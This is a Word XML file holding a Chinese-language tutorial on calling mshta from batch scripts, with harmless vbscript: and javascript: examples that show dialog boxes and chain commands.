          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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inputbox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 xml:space="preserve"> "</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>內容</w:t>
            </w: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"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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d=</w:t>
            </w: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msgbox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("</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>內容</w:t>
            </w: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")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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e=</w:t>
            </w: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inputbox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("</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>內容</w:t>
            </w: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")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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這段代碼中，第一行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1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是數值，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a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是變數，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a=1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是一個設置變數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a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的值為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1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的語句。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第二行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2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是數值，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b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是變數，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b=2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是語句。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第三行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a+b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這個整體相當於數值，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c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是變數，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c=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a+b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是語句。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至於第四行，情況有些變化：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/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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內容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是數值，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msgbox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內容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這個整體是一個彈出對話方塊的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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的</w:t>
      </w:r>
      <w:proofErr w:type="gram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語句。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第五行，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內容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是數值，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inputbox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內容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是語句。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第六行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msgbox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("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內容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")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這個整體相當於數值（注意它與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msgbox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內容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的區別），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d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是變數，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d=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msgbox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("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內容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")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是一個設置變數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d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的值為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msgbox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("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內容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")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的語句。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同理，第七行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inputbox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("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內容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")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相當於數值，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e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是變數，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e=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inputbox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("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內容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")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是語句。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因此，以下命令都是有效的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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（</w:t>
      </w:r>
      <w:proofErr w:type="gram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其中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&amp; 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window.close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暫時不去理會</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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）</w:t>
      </w:r>
      <w:proofErr w:type="gram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：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代碼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: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1463"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidTr="00D732AB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32AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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lastRenderedPageBreak/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11463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32AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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lastRenderedPageBreak/>
              <w:t>@echo</w:t>
            </w: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 xml:space="preserve"> </w:t>
            </w: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off</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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mshta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 xml:space="preserve"> "vbscript:1 &amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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window.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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mshta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 xml:space="preserve"> "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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vbscript:a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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 xml:space="preserve"> &amp; </w:t>
            </w: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window.close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"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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lastRenderedPageBreak/>
              <w:t>mshta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 xml:space="preserve"> "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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vbscript:a</w:t>
            </w:r>
            <w:proofErr w:type="gram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+b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 xml:space="preserve"> &amp; </w:t>
            </w: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window.close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"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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mshta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 xml:space="preserve"> "</w:t>
            </w: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vbscript:msgbox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("</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>內容</w:t>
            </w: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 xml:space="preserve">") &amp; </w:t>
            </w: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window.close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"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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mshta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 xml:space="preserve"> "</w:t>
            </w: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vbscript:inputbox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("</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>內容</w:t>
            </w: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 xml:space="preserve">") &amp; </w:t>
            </w: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window.close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"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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lastRenderedPageBreak/>
        <w:t>而以下命令都是無效的：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代碼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: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1463"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidTr="00D732AB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32AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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  <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11463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32AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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::</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>以下命令都是無效的</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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mshta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 xml:space="preserve"> "</w:t>
            </w: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vbscript:msgbox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 xml:space="preserve"> "</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>內容</w:t>
            </w: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""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="264" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pP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mshta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 xml:space="preserve"> "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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vbscript:inputbox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> "</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>內容</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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現在明白了吧？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對於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js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，也有類似的情況，只是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js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中不明顯罷了。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br/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另外，我剛剛發現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中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execute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函數可以調用語句。很複雜，自己研究吧。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b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>連接多個命令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連接多個命令時，每</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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個</w:t>
      </w:r>
      <w:proofErr w:type="gram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命令都必須遵守上述的基本規則。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※對於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js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，用分號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; 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連接多個命令。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代碼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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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"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javascript:alert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('OK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！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'</w:t>
      </w:r>
      <w:proofErr w:type="gram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);alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>('1234');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window.close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()"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※對於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，用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&amp; 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連接多個命令。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代碼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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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"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vbscript:msgbox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("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內容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") &amp; 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msgbox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("1234") &amp; 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window.close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"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※注意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&amp;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在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bat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中有特殊意義，所以此時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後面的代碼必須用引號引起來！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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>window.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的作用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試著運行下面的代碼：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代碼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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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"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vbscript:msgbox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("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內容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")"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你會發現，不僅彈出了需要的對話方塊，還出現了一個討厭</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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的白框</w:t>
      </w:r>
      <w:proofErr w:type="gram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。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window.close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的作用就是關閉它。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b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>為什麼</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wscript.sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>不能用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lastRenderedPageBreak/>
        <w:t>微軟最初設計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時是為了運行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hta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程式（可近似理解為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HTML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網頁程式），而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wscript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在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HTML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網頁上用不了（它只能在真正的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js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或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上用），所以調用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js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或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時要避開它。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b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs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 w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>製作圖形介面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其實，利用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也可以在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bat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中製作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windows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圖形介面，但在這裡就不詳細介紹了。如果有興趣請看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hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D732AB">
          <w:rPr>
            <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="428BCA"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://baike.baidu.com/view/712376.htm</w:t>
        </w:r>
      </w:hyperlink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或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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "https://www.jb51.net/article/40060.htm" \t "_blank" </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="428BCA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://www.jb51.net/article/40060.htm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fldChar w:fldCharType="end"/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b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>引用解釋</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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※</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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所引用的命令必須相當於一個數值或變數。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這個只是針對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vbscript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協議。用其他方式運行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語句則可以。比如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about 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協議：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代碼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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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"about: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確切的說法應該是，用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vbscript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協議運行的代碼中，不能包含語句，只能是運算式和函數（此時函數其實也是運算式）。這裡的語句是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概念中的語句（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statement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），而不是普通的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“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一句話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”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的意思（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sentence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）。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msgbox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內容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",0,"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標題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，這個的確是一條語句，而不是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“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相當於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”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/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e=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inputbox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("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內容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")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，在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腳本，它可以作為語句（設定陳述式）也可以是運算式（比較變數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e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與函數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inputbox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("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內容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")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的返回值）。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如果用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vbscript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協議運行，則它只是比較運算式。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vbscript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協議運行代碼可以用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&amp;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連接不同的運算式，這個發現不錯。其實就是運算式連接子。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但如果要運行更複雜的語句，最好是用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execute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。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execute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也很簡單。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如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alert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方法，它不能直接在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腳本中運行，因為它是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window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物件的方法，而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window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物件是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、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IE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等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html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解譯器提供的，指令碼裝載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WSH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並沒有提供。除非在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創建這樣的物件，比如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InternetExplorer.Application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運行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js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語句沒有那樣的限制。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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超版都說了</w:t>
      </w:r>
      <w:proofErr w:type="gram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，只是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vbscript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協議有此限制。看來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vbs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到底是比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js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要差一點。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比如下面，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var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a=1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就是明顯的設定陳述式，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alert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方法與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close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方法也可以看作語句。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lastRenderedPageBreak/>
        <w:t>代碼</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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javascript:var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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a=1; alert(a); close();"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不是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CreateObject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("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WScript.Shell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")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，而是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createObject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("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Microsoft.XMLHTTP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>")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我一直想做一個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實現</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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檔</w:t>
      </w:r>
      <w:proofErr w:type="gram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下載，但總有些問題。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Microsoft.XMLHTTP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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元件自身的問題，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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禁止跨域操作</w:t>
      </w:r>
      <w:proofErr w:type="gram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。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr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以上就是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命令用法示例的詳細內容，更多關於</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令用法的資料請關注腳本之家其它相關文章！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004726B" w:rsidRPr="00D732AB" w:rsidRDefault="00CC4E1B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0004726B" w:rsidRPr="00D732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AB"/>
    <w:rsid w:val="003661FE"/>
    <w:rsid w:val="0047747F"/>
    <w:rsid w:val="0074741E"/>
    <w:rsid w:val="008A5A1F"/>
    <w:rsid w:val="00C230C5"/>
    <w:rsid w:val="00CC4E1B"/>
    <w:rsid w:val="00D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50EA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B5AB3403-8BAD-403B-AEF4-523870DD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47747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4E1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D732A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747F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30">
    <w:name w:val="標題 3 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D732AB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D732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D732AB"/>
    <w:rPr>
      <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體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732AB"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D732AB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CC4E1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post-time">
    <w:name w:val="post-time"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CC4E1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-meta-item-icon">
    <w:name w:val="post-meta-item-icon"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CC4E1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-meta-item-text">
    <w:name w:val="post-meta-item-text"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CC4E1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-category">
    <w:name w:val="post-category"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CC4E1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-meta-divider">
    <w:name w:val="post-meta-divider"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CC4E1B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CC4E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CC4E1B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CC4E1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CC4E1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CC4E1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="number">
    <w:name w:val="number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CC4E1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="builtin">
    <w:name w:val="built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CC4E1B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="literal">
    <w:name w:val="literal"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CC4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657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953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49A7EA"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1017737904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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="68775442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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1992246963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4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420855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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1979531917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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1265648295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94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2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53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24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804965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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1034773312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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="783184954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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
